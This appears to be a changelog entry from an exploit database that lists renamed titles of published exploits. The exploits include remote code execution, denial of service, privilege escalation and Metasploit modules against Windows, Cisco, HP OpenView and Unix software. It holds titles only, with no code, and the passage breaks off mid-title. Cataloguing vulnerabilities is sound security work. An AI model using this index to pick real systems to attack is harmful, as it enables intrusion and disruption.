DB: 2017-06-23
11 new exploits Microsoft Windows - ASN.1 LSASS.exe Remote Exploit (MS04-007) Microsoft Windows - ASN.1 'LSASS.exe' Remote Exploit (MS04-007) Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit Slackware Linux - '/usr/bin/ppp-off' Insecure /tmp Call Exploit Microsoft Windows XP/2000 - TCP Connection Reset Remote Attack Tool Microsoft Windows XP/2000 - TCP Connection Reset Remote Exploit PostgreSQL 8.01 - Remote Reboot Denial of Service PostgreSQL 8.01 - Remote Reboot (Denial of Service) Cisco IP Phone 7940 - (Reboot) Denial of Service Cisco IP Phone 7940 - Reboot (Denial of Service) Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Attack Denial of Service Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service) Dropbear / OpenSSH Server - (MAX_UNAUTH_CLIENTS) Denial of Service Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service 2WIRE Modems/Routers - CRLF Denial of Service 2WIRE Modems/Routers - 'CRLF' Denial of Service FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service) Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Cisco Phone 7940/7960 - 'SIP INVITE' Remote Denial of Service Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Hang / Crash (Denial of Service) Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 - Hang / Crash (Denial of Service) Linksys SPA941 - (remote reboot) Remote Denial of Service Linksys SPA941 - Remote Reboot (Denial of Service) CA BrightStor Backup 11.5.2.0 - caloggderd.exe Denial of Service CA BrightStor Backup 11.5.2.0 - Mediasvr.exe Denial of Service CA BrightStor Backup 11.5.2.0 - 'caloggderd.exe' Denial of Service CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Denial of Service Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) - Denial of Service Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of 
Service Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service Xerox Phaser 8400 - (reboot) Remote Denial of Service Xerox Phaser 8400 - Remote Reboot (Denial of Service) Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot (Denial of Service) Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service Linksys WAG54G v2 Wireless ADSL Router - httpd Denial of Service Netgear SSL312 Router - Denial of Service NETGEAR SSL312 Router - Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service NETGEAR WGR614v9 Wireless Router - Denial of Service Gigaset SE461 WiMAX router - Remote Denial of Service Gigaset SE461 WiMAX Router - Remote Denial of Service Netgear DG632 Router - Remote Denial of Service NETGEAR DG632 Router - Remote Denial of Service Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC) Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC) Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot (Denial of Service) Siemens Gigaset SE361 WLAN - Remote Reboot Exploit Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service) Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service) Apple Mac OSX 10.6 - HFS FileSystem Exploit (Denial of Service) HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC) Cyclope Internet Filtering Proxy 4.0 - 'CEPMServer.exe' Denial of Service (PoC) AirTies-4450 - Unauthorized Remote Reboot AirTies-4450 - Unauthorized Remote Reboot (Denial of Service) Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit SunOS 4.1.1 - /usr/release/bin/makeinstall Exploit SunOS 4.1.1 - /usr/release/bin/winstall Exploit Digital Ultrix 
4.0/4.1 - '/usr/bin/chroot' Exploit SunOS 4.1.1 - '/usr/release/bin/makeinstall' Exploit SunOS 4.1.1 - '/usr/release/bin/winstall' Exploit Linux Kernel 2.2 - 'ldd core' Force Reboot Linux Kernel 2.2 - 'ldd core' Force Reboot (Denial of Service) Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow OReilly WebSite 1.x/2.0 - 'win-c-sample.exe' Buffer Overflow Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption (Denial of Service) ID Software Quake 3 - 'smurf attack' Denial of Service ID Software Quake 3 - 'SMURF' Denial of Service Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow Melange Chat System 2.0.2 Beta 2 - '/yell' Remote Buffer Overflow Microsoft Windows NT/2000 - cmd.exe CD Buffer Overflow Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow Gordano Messaging Suite 9.0 - WWW.exe Denial of Service Gordano Messaging Suite 9.0 - 'WWW.exe' Denial of Service TYPSoft FTP Server 1.1 - Remote CPU Consumption Denial of Service TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service) Microsoft Windows XP - explorer.exe Remote Denial of Service Microsoft Windows XP - 'explorer.exe' Remote Denial of Service VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions VMware Workstation - 'vprintproxy.exe' JPEG2000 Images Multiple Memory Corruptions Gattaca Server 2003 - web.tmpl Language Variable CPU Consumption Denial of Service Gattaca Server 2003 - 'web.tmpl' 'Language' Parameter CPU Consumption (Denial of Service) VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow Microsoft Windows XP - explorer.exe .tiff Image Denial of Service Microsoft Windows XP - 'explorer.exe' '.tiff' Image 
Denial of Service Microsoft Windows XP - TSShutdn.exe Remote Denial of Service Microsoft Windows XP - 'TSShutdn.exe' Remote Denial of Service Orenosv HTTP/FTP Server 0.8.1 - CGISSI.exe Remote Buffer Overflow Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow PHPMailer 1.7 - Data() Function Remote Denial of Service PHPMailer 1.7 - 'Data()' Function Remote Denial of Service Sights 'N Sounds Streaming Media Server 2.0.3 - SWS.exe Buffer Overflow Sights 'N Sounds Streaming Media Server 2.0.3 - 'SWS.exe' Buffer Overflow DSocks 1.3 - Name Variable Buffer Overflow DSocks 1.3 - 'Name' Parameter Buffer Overflow Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow Android Zygote - Socket and Fork bomb Attack Android Zygote - Socket and Fork Bomb (Denial of Service) Nvidia NView 3.5 - Keystone.exe Local Denial of Service Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service Ipswitch WS_FTP 2007 Professional - WSFTPURL.exe Local Memory Corruption Ipswitch WS_FTP 2007 Professional - 'WSFTPURL.exe' Local Memory Corruption Larson Network Print Server 9.4.2 build 105 - (LstNPS) NPSpcSVR.exe License Command Remote Overflow Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow Linksys WRH54G 1.1.3 - (Wireless-G Router) Malformed HTTP Request Denial of Service Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote Denial of Service Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service Adobe Flash - Setting Variable Use-After-Free Adobe Flash - 'Setting' Variable Use-After-Free Git 1.9.5 - ssh-agent.exe Buffer Overflow Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem 
Buffer Overflow Adobe Flash TextField Variable - Use-After Free Adobe Flash TextField.Variable Setter - Use-After-Free Adobe Flash - 'TextField' Variable Use-After Free Adobe Flash - TextField.Variable Setter Use-After-Free Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/reboot.cgi Unauthenticated Remote Reboot Denial of Service Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service) Microsoft WinDbg - logviewer.exe Crash (PoC) Microsoft WinDbg - 'logviewer.exe' Crash (PoC) Microsoft Windows - 'win32k!NtGdiExtGetObjectW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetOutlineTextMetricsInternalW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetTextMetricsW' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiGetRealizationInfo' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!ClientPrinterThunk' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (BasicLimitInformation_ ExtendedLimitInformation)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationProcess (ProcessVmCounters)' Kernel Stack Memory Disclosure Microsoft Windows - 'win32k!NtGdiMakeFontDir' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure UUCP Exploit - File Creation/Overwriting (symlinks) Exploit UUCP Exploit - File Creation/Overwriting (Symlinks) Exploit HP-UX 11.0 - /bin/cu Privilege Escalation HP-UX 11.0 - '/bin/cu' Privilege Escalation Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Solaris 2.6 / 2.7 - '/usr/bin/write' Local Overflow IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - 
/usr/lib/print/netprint Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Exploit Tru64 UNIX 4.0g - /usr/bin/at Privilege Escalation Slackware 7.1 - /usr/bin/mail Local Exploit Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation Slackware 7.1 - '/usr/bin/mail' Local Exploit Solaris 2.4 - /bin/fdformat Local Buffer Overflows Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities AIX 4.2 - /usr/dt/bin/dtterm Local Buffer Overflow AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow SGI IRIX - /bin/login Local Buffer Overflow IRIX 5.3 - /usr/sbin/iwsh Buffer Overflow Privilege Escalation SGI IRIX - '/bin/login' Local Buffer Overflow IRIX 5.3 - '/usr/sbin/iwsh' Buffer Overflow Privilege Escalation Apple Mac OSX 10.3.7 - mRouter Privilege Escalation Apple Mac OSX 10.3.7 - 'mRouter' Privilege Escalation Sudo 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Privilege Escalation Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit HP-UX 11i - (LIBC TZ enviroment Variable) Privilege Escalation HP-UX 11i - 'LIBC TZ' Environment Variable Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation Adobe Photoshop CS2 - / CS3 Unspecified '.bmp' File Buffer Overflow Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow Debian - (symlink attack in login) Arbitrary File Ownership (PoC) Debian - (Symlink In Login) Arbitrary File Ownership (PoC) Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack xscreensaver 5.01 - 
Arbitrary File Disclosure Symlink Exploit PHP 5.2.12/5.3.1 - symlink() open_basedir Bypass PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH) HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH) Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL Microsoft Windows 7 - 'wab32res.dll' 'wab.exe' DLL Hijacking Oracle 10/11g - exp.exe Parameter file Local Buffer Overflow (PoC) Oracle 10/11g - 'exp.exe' 'file' Parameter Local Buffer Overflow (PoC) ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT symlink ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT Symlink Exploit Hancom Office 2007 - Reboot.ini Clear-Text Passwords Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords G. Wilford man 2.3.10 - Symlink G. Wilford man 2.3.10 - Symlink Exploit X11R6 3.3.3 - Symlink X11R6 3.3.3 - Symlink Exploit SGI IRIX 6.2 - /usr/lib/netaddpr Exploit SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit SCO Open Server 5.0.5 - 'userOsa' symlink SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Spoolss.exe DLL Insertion Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Spoolss.exe' DLL Insertion FreeBSD 3.3 gdc - Symlink FreeBSD 3.3 gdc - Symlink Exploit SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink Exploit FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - /proc File Sytem FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - '/proc' FileSystem Exploit Debian 2.1 - apcd Symlink Debian 2.1 - apcd Symlink Exploit SCO Unixware 7.1/7.1.1 - ARCserver /tmp symlink SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit Sun Workshop 5.0 - Licensing Manager Symlink Sun Workshop 5.0 - Licensing Manager Symlink Exploit Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink Exploit OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - 
'/usr/tmp/' Symlink OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink Exploit KDE 1.1 - /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow KDE 1.1/1.1.1/1.1.2/1.2 - kdesud DISPLAY Environment Variable Overflow HP-UX 10.20/11.0 man - /tmp Symlink Exploit HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit HP-UX 10.20/11.0 crontab - /tmp File HP-UX 10.20/11.0 - crontab '/tmp' File Exploit Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation Solaris 10 Patch 137097-01 - Symlink Privilege Escalation Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Tower Toppler 0.99.1 - 'Display' Parameter Local Buffer Overflow Microsoft Windows Server 2000 - RegEdit.exe Registry Key Value Buffer Overflow Microsoft Windows Server 2000 - 'RegEdit.exe' Registry Key Value Buffer Overflow RedHat 9.0 / Slackware 8.1 - /bin/mail Carbon Copy Field Buffer Overrun RedHat 9.0 / Slackware 8.1 - '/bin/mail' Carbon Copy Field Buffer Overrun Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure Linux Kernel 2.2.x / 2.4.x - '/proc' Filesystem Potential Information Disclosure Microsoft Windows XP/2000 - RunDLL32.exe Buffer Overflow Microsoft Windows XP/2000 - 'RunDLL32.exe' Buffer Overflow Tower Toppler 0.96 - HOME Environment Variable Local Buffer Overflow Tower Toppler 0.96 - 'HOME Environment' Parameter Local Buffer Overflow Top 1.x/2.0 - Home Environment Variable Local Buffer Overflow Top 1.x/2.0 - 'Home Environment' Parameter Local Buffer Overflow XBlast 2.6.1 - HOME Environment Variable Buffer Overflow XBlast 2.6.1 - 'HOME Environment' Variable Buffer Overflow XPCD 2.0.8 - Home Environment Variable Local Buffer Overflow XPCD 2.0.8 - 'Home Environment' Variable Local Buffer Overflow XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun XSOK 1.0 2 - 'LANG Environment' Variable Local Buffer Overrun Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' 
Key Stroke Timing Local Disclosure ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution ELinks Relative 0.10.6 / 011.1 - Path Arbitrary Code Execution Oracle - HtmlConverter.exe Buffer Overflow Oracle - 'HtmlConverter.exe' Buffer Overflow Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Exploit Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036) Microsoft Windows - DHCP Client Broadcast Exploit (MS06-036) Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - (FTP) Remote Exploit Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - 'FTP' Remote Exploit Oracle 9i / 10g - 'utl_file' File System Access Exploit Oracle 9i / 10g - 'utl_file' FileSystem Access Exploit HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'ovalarmsrv.exe' Remote Overflow Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb) Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB) Sagem F@ST (Routers) - (dhcp hostname attack) Cross-Site Request Forgery Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC) Microsoft Windows - SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068) Microsoft Windows - SmbRelay3 NTLM Replay Exploit (MS08-068) Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Attack Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Apple Safari 3.2.x - (XXE attack) Local File Theft Apple Safari 3.2.x - (XXE) Local File Theft Netgear DG632 Router - Authentication Bypass NETGEAR DG632 Router - Authentication Bypass BRS Webweaver 1.33 - /Scripts Access Restriction Bypass BRS Webweaver 1.33 - '/Scripts' 
Access Restriction Bypass Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow Ada Image Server 0.6.7 - 'imgsrv.exe' Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovalarm.exe' CGI Unauthenticated Remote Buffer Overflow HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow Cisco ASA 8.x - VPN SSL Module Clientless URL-list control Bypass HP OpenView Network Node Manager (OV NNM) - OvWebHelp.exe CGI Topic Overflow HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid Hostname Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid ICount Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit minerCPP 0.4b - Remote Buffer Overflow / Format String Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1) HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (1) HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2) HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (2) Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit) Microsoft 
Internet Explorer - 'Winhlp32.exe' MsgBox Code Execution (MS10-023) (Metasploit) IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow (Metasploit) IBM Lotus Domino Sametime - 'STMux.exe' Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - 'OVAS.exe' Unauthenticated Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Snmp.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovalarm.exe' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'OpenView5.exe' CGI Buffer Overflow (Metasploit) IBM TPM for OS Deployment 5.1.0.x - rembo.exe Buffer Overflow (Metasploit) IBM TPM for OS Deployment 5.1.0.x - 'rembo.exe' Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - EarthAgent.exe Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe execvp Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'OvJavaLocale' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'execvp' Buffer Overflow (Metasploit) HP 
OpenView Network Node Manager (OV NNM) - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit) HP OpenView Network Node Manager - snmpviewer.exe Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe' 'schdParams' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'ICount' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'main' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' Unrecognized Option Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'ovutil' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'Hostname' CGI Buffer Overflow (Metasploit) 7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit) 7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Stack Overflow (Metasploit) Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow (Metasploit) Citrix Provisioning Services 5.6 - 'streamprocess.exe' Buffer Overflow (Metasploit) FactoryLink - vrn.exe Opcode 9 Buffer Overflow (Metasploit) FactoryLink - 
'vrn.exe' Opcode 9 Buffer Overflow (Metasploit) HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit) HP - 'OmniInet.exe' Opcode 27 Buffer Overflow (Metasploit) Symantec Backup Exec 12.5 - MiTM Attack Symantec Backup Exec 12.5 - Man In The Middle Exploit HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Cookie Handling Buffer Overflow (Metasploit) Sunway Force Control SCADA 6.1 SP3 - httpsrv.exe Exploit Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Exploit Procyon Core Server HMI 1.13 - Coreservice.exe Stack Buffer Overflow (Metasploit) Procyon Core Server HMI 1.13 - 'Coreservice.exe' Stack Buffer Overflow (Metasploit) HP Diagnostics Server - magentservice.exe Overflow (Metasploit) HP Diagnostics Server - 'magentservice.exe' Overflow (Metasploit) Sunway ForceControl - SNMP NetDBServer.exe Opcode 0x57 (Metasploit) Sunway ForceControl - SNMP 'NetDBServer.exe' Opcode 0x57 (Metasploit) Trend Micro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow (Metasploit) Trend Micro Control Manager 5.5 - 'CmdProcessor.exe' Stack Buffer Overflow (Metasploit) Antelope Software W4-Server 2.6 a/Win32 - Cgitest.exe Buffer Overflow Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Buffer Overflow Netscape Enterprise Server / Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities Netscape Enterprise Server / Novell Groupwise 5.2/5.5 - 'GWWEB.EXE' Multiple Vulnerabilities FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - htimage.exe File Existence Disclosure FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - 'htimage.exe' File Existence Disclosure NAI Net Tools PKI Server 1.0 - strong.exe Buffer Overflow NAI Net Tools PKI Server 1.0 - 'strong.exe' Buffer Overflow Mandrake 6.1/7.0/7.1 - /perl http Directory Disclosure Mandrake 6.1/7.0/7.1 - '/perl' HTTP Directory Disclosure Microsoft IIS 3.0 - newdsn.exe File Creation Microsoft 
IIS 3.0 - 'newdsn.exe' File Creation Greg Matthews - Classifieds.cgi 1.0 Hidden Variable Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - 'wguest.exe' Arbitrary File Access WebCom datakommunikation Guestbook 0.1 - 'rguest.exe' Arbitrary File Access MetaProducts Offline Explorer 1.x - File System Disclosure MetaProducts Offline Explorer 1.x - FileSystem Disclosure Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Detection Evasion Webmin 1.580 - /file/show.cgi Remote Command Execution (Metasploit) Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow (Metasploit) HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow (Metasploit) HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit) HP Operations Agent - Opcode 'coda.exe' 0x34 Buffer Overflow (Metasploit) Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure Netgear FM114P 